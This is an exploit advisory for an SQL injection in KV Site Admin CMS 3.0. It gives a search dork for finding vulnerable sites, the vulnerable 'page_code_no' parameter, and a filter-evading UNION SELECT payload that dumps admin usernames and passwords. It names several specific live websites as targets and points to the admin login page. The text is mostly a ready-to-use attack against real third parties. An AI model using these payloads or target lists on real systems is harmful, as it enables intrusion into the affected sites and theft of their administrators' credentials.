##################### # Exploit Title : KV Site Admin CMS 3.0 SQL injection Vulnerability # Exploit Author : xBADGIRL21 # Dork : e.World Technology Ltd. All rights reserved "Admin Area - Version 3.0" # Version: 3.0 # MyBlog: http://xbadgirl21.blogspot.com # Tested on: [ BackBox] # skype:xbadgirl21 # Video Proof : https://youtu.be/43TuHcB_Kec # Date: 26/08/2016 ##################### # [+] DESCRIPTION : ##################### # [+] an SQL injection been Detected in KV Site Admin CMS 3.0 after you add ['] to the # [+] Vuln Target Parameter you will get error like : # [+] You have an error in your SQL syntax; check the manual that corresponds to your # [+] MySQL server version for the right syntax to use near ''' at line 1 ##################### # [+] Poc : ##################### # [page_code_no] Get Parameter Vulnerable To SQLi #--------------------- # http://www.site.com/index-h.php?page_code_no=[SQLi] ----------------------- # http://www.kvrihandnagar.org/index-h.php?page_code_no=19' # http://www.kvrihandnagar.org/index-h.php?page_code_no=-19 /*!12345union*/ select 1,2,/*!12345group_coNcat(username,0x3a,password)*/,4 from 01_admin_detail-- ###################### # [+] Live Demo : ###################### + http://www.kvmughalsarai.org/index-h.php?page_code_no=40' + http://www.kvsrovns.org/index-h.php?page_code_no=1' ###################### # Admin Panel : http://www.site.com/kv_admin/login.php ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere #######################